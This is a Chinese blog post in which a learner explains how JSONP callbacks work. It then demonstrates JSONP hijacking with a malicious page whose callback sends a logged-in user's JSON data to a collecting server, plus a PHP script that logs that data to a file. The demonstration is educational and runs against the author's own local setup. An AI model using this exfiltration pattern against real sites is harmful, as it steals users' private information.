关于JSONP的苦逼理解过程

最新推荐文章于 2022-01-07 09:38:55 发布
最新推荐文章于 2022-01-07 09:38:55 发布
阅读量747 收藏 7
点赞数
分类专栏: Web安全 文章标签: jsonp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39850969/article/details/83003592
版权

由于太菜,在理解jsonp这个概念的时候花了很多时间,大佬们都说这个很简单,下面简单记录一下关于jsonp的学习。

关于jsonp的什么概念我就不说了,网上有很多,此处引自一篇文章:https://www.cnblogs.com/dowinning/archive/2012/04/19/json-jsonp-jquery.html

里面关于jsonp介绍的非常详细。

 

我理解的jsonp的具体实现:

先写上测试代码:

本地文件:http://127.0.0.1/jsonp.html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <title></title>
    <script type="text/javascript">
    var localHandler = function(data){
        alert('I\'m local data,can called by Cross domain\'s file remote.js,Long-range js\'s data is : ' + data.result);
    };
    </script>
    <script type="text/javascript" src="http://xxx.xxx.xxx.xxx/remote.js"></script>
</head>
<body>

</body>
</html>

代码中的xxx.xxx.xxx.xxx是我的vps,要测试请更换自己的远程服务器。

 

远程服务器中remote.js文件内容:xxx.xxx.xxx.xxx/remote.js

localHandler({"result":"I'm remote data."});

 

这个过程运用了回调函数,这里的意思就是我们访问的这个网站(也就是本地服务器)先定义一个函数,这个函数名要与我们后面调用的远程服务器的js文件中json格式数据的变量名一样,比如就是remote.js文件中json格式数据的变量名是localHandler。

这样定义的意义是:我们在本地jsonp.html中定义了一个localHandler函数,然后跨域加载了remote.js文件,remote.js文件里面有变量名为localHandler的json数据,这样就相当于调用了jsonp.html文件中前面定义的localHandler这个函数,里面的json数据就是data这个参数。

这样就可以实现以用户的想法来展示json数据,这也是我后来才理解"的其实就是字符串的拼接"。

 

关于一般jsonp存在的callback类似的参数:

我看的这篇文章里面有说:为了实现用户自定义回调函数,用户传递一个callback参数,然后服务器会将这个参数作为一个json字符串数据的变量名,自动生成一串json数据。比如用户传递  http://xxx.xxx.xxx.xxx/xxx.php?id=1&callback=test

然后xxx.php这个脚本就会自动生成类似的代码:

test({
"id":1,
"price":1000,
"size":"100px",
"width":"100px"
});

在本地调用文件中定义的函数名也是以变量的形式存在,根据callback传递的参数作为函数名,然后就可以实现用户自定义函数名实现回调加载数据。

 

 

JSONP劫持:

有一些场景,用户个人信息使用json格式显示,只能当前用户访问,我们可以构造一个恶意文件,让登陆在线的用户访问,获取用户个人信息中的敏感信息,将这些信息发送到我们自己的vps上面,这是一个jsonp劫持利用。

jsonp1.html文件主要代码:

<script type="text/javascript">
function localHandler(data){
var xmlhttp = new XMLHttpRequest();
var url = "http://127.0.0.1/jsonp.php?data=" + JSON.stringify(data);

xmlhttp.open("GET", url, true);
xmlhttp.send();
}
</script>
<script src="http://xxx.xxx.xxx.xxx/remote.js"></script>

 

然后本地的jsonp.php的内容为:

<?php

$data = $_GET['data'];
$fh = fopen('data.txt', 'a');
fwrite($fh, $data);
fclose($fh);

?>

 

然后在以用户的视角在客户端访问  http://127.0.0.1/jsonp1.html  

用户访问过后就可以实现抓取数据到本地了(通常用vps,此处本地只是测试)。

 

里面的数据就是我远程服务器中的json数据。

这仅作为我个人理解,记录,有大佬发现不对的地方希望可以指出。

TuudOp
关注
专栏目录
JSONP
wythhhhh的博客
09-28 52
ajax 请求时,浏览器要求当前网页和 server 必须同源(安全)同源:协议、域名、端口,三者必须一致
JSONP相关知识小结
渔舟唱晚1990的专栏
11-06 235
一、关于域名 顶级域名 顶级域名分为两类:一是国家级顶级域名(national top-level domainnames,简称nTLDs),200多个国家都按照ISO3166国家代码分配了顶级域名,例如中国是.cn,美国是.us,日本是.jp等;二是国际顶级域名(international top-level domain names,简称iTDs),例如表示工商企业的 .Co
jsonp理解
weixin_44366185的博客
01-14 262
0.什么是jsonp JSONP是JSON with Padding的略称。它是一个非官方的协议,它允许在服务器端集成Script tags返回至客户端,通过javascript callback的形式实现跨域访问(这仅仅是JSONP简单的实现形式). 1.JSONP的由来 根据浏览器同源策略,a 域的js不能直接访问 b域名的信息,但是script 标签的src属性可以跨域引用文件,jsonp是...
JSONP理解
LEE1996JUN的博客
03-26 243
    JSONP是JSON with padding(填充式JSON或参数式JSON)的简写。JSONP由两部分组成:回调函数和数据。回调函数是当响应到来时应该在页面中调用的函数。回调函数的名字一般是在请求中指定的。而数据就是传入回调函数中的JSON数据。    一般通过Ajax进行通信时,都会受到浏览器同源策略的约束,难以访问跨域资源。这里的跨域指的是:协议 域名 端口号 只要其中的一个不同,...
JSONP理解
Robergean的博客
09-08 274
JSONP (JSON with Padding) json 的一种"使用模式",可以让网页从别的域名(网站)那获取资料,即跨域读取数据。 由于 ajax请求受同源策略影响,不允许进行跨域请求,而script标签src属性中的链接却可以访问跨域的js脚本,利用这个特性,服务端不再返回JSON格式的数据,而是返回一段调用某个函数的js代码,在src中进行了调用,这样实现了跨域。 JSONP的优缺点 1.优点 它不像XMLHttpRequest对象实现的Ajax请求那样受到同源策略的限制,JSONP可以跨越
JSONP理解
捉虫大师
10-16 528
JSONP是跨域获取JSON的方式;有一篇wenz
关于JSONP理解
破晓
09-06 292
点击打开链接
JSONP 的原理、理解 与 实例分析
10-15
执行过程就是调用了客户端定义的回调函数,并将JSON数据作为参数传入。这样,前端就能接收到跨域请求的数据了。 ### JSONP的实例分析 我们可以通过一个简单的实例来分析JSONP的整个流程。 假设客户端运行在`***`...
关于jQuery.ajax()的jsonp碰上post详解
10-19
在前端开发中,跨域问题是经常需要面对的一个技术挑战。所谓同源策略,是指在浏览器中...通过理解跨域请求的工作原理和JSONP实现方式,开发者可以更加灵活地解决前端开发中的跨域问题,同时确保应用的安全性和稳定性。
jsonp
01-08
JSONP,全称为“JSON with Padding”,是一种在JavaScript中实现跨域数据交互的常见方法。由于浏览器的安全策略——同源策略,JavaScript通常被限制只能访问与当前页面同源(同协议、同域名、同端口)的资源。而...
关于JSON与JSONP简单总结
01-21
一、什么是json JSON(JavaScript Object Notation) 是一种轻量级的数据交换格式。 易于人阅读和编写。同时也易于机器解析和生成。 它基于JavaScript Programming Language, Standard ECMA-262 3rd ...JSONP(JSON wi
对于jsonp理解
weixin_49684597的博客
05-17 252
什么是jsonpjsonp的概念,jsonp是一种比较轻量级别的数据传输格式,适用于 web 应用中。jsonp格式数据的编码和解析基本 在所有主流语言中都被实现,所以现在大部分前后端分离的架构都以JSON格式进行数据的传输。 那么JSONP是什么呢? 首先抛出浏览器同源策略这个概念,为了保证用户访问的安全,浏览器使用了同源策略,为了限制JavaScript的访 问能力,即不允许访问非同源的页面,详细的概念大家可以自行百度。这里大家只要知道,在ajax中,不允许请求 非同源的URL就可以了,比如
jsonp原理实现过程
MX_YANG_的博客
10-10 257
jsonp的作用:就是解决跨域问题。 jsonp原理:通过script的src属性发送get请求,服务器接收请求,以函数调用的形式将数据携带回来。 注意点:jsonp只能实现get请求的跨域。 验证jsonp的实现原理需要以下几步: 1.我们需要准备一个html文件和javascript文件 2. 初始化javascript文件 //导入express const express=require('express') //实例化一个服务器 const app=express() //.
jsonp理解及使用
tuantaun_的博客
07-30 276
前言:Jsonp是用来解决跨域问题的古老方法,而跨域是指a页面想获取b页面资源,如果a、b页面的协议、域名、端口、子域名不同,或是a页面为ip地址,b页面为域名地址,所进行的访问行动都是跨域的,而浏览器为了安全问题一般都限制了跨域访问,也就是不允许跨域请求资源(同源策略),典型的例子如iframe窗口和window.open方法打开的窗口,它们与父窗口无法通信。 Jsonp是什么? Jsonp即J...
jsonp的基础理解-简单易懂
qq_34272207的博客
05-09 117
因为参加春招面试,一面被问到跨域的问题,当时一脸懵,之后了解了之后知道jsonp是一个比较典型的跨域方法,但是看了很多博客和讲解并不是很能理解,所以根据自己所看的简单总结。 一、JSONP产生的过程 1、众所周知,ajax需要满足同源策略,所以直接请求存在跨域问题的一切文件,都会报错。 2、但是当我们在编写html页面时,会发现有些特殊标签不受跨域的影响,比如:调用js文件和拥有src属性的标签(...
jsonp方法跨域的过程
杨欢博的博客
01-07 557
说到AJAX就会不可避免的面临两个问题,第一个是AJAX以何种格式来交换数据?第二个是跨域的需求如何解决?这两个问题目前都有不同的解决方案,比如数据可以用自定义字符串或者用XML来描述,跨域可以通过服务器端代理来解决。 但到目前为止最被推崇或者说首选的方案还是用JSON来传数据,靠JSONP来跨域。而这就是本文将要讲述的内容。 JSON和JSONP虽然只有一个字母的差别,但其实他们根本不是一回事儿:JSON是一种数据交换格式,而JSONP是一种依靠开发人员的聪明才智创造出的一种非官方跨域数据交互协议。我们拿
jsonp步骤_JSONP的实现流程
weixin_28717647的博客
01-17 303
在进行AJAX的时候会经常产生这样一个报错:看红字,这是浏览器的同源策略,使跨域进行的AJAX无效。注意,不是不发送AJAX请求(其实就是HTTP请求),而是请求了,也返回了,但浏览器‘咔擦’一声,下面没有了。对比下fiddler和浏览器抓的包的异同:fiddler:chrome:简而言之,浏览器这边就是头(response header)给看,身体(response body)不给看。什么是同源...
关于flask的SSTI注入
Kr的博客
01-21 7232
ssti注入又称服务器端模板注入攻击(Server-Side Template Injection),和sql注入一样,也是由于接受用户输入而造成的安全问题。 它的实质就是服务器端接受了用户的输入,没有经过过滤或者说过滤不严谨,将用户输入作为web应用模板的一部分,但是在进行编译渲染的过程中,执行了用户输入的恶意代码,造成信息泄露,代码执行,getshell等问题。 这个问题主要是出在web应...
理解JSONP:解决跨域访问问题
"神奇的理解jsonp" 在前端开发中,JSONP是一种常见的解决跨域问题的技术,尤其是在JavaScript中。本文将深入探讨JSONP的概念、工作原理及其与JSON的关系。 首先,我们来了解一下导致跨域问题的原因。浏览器为了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值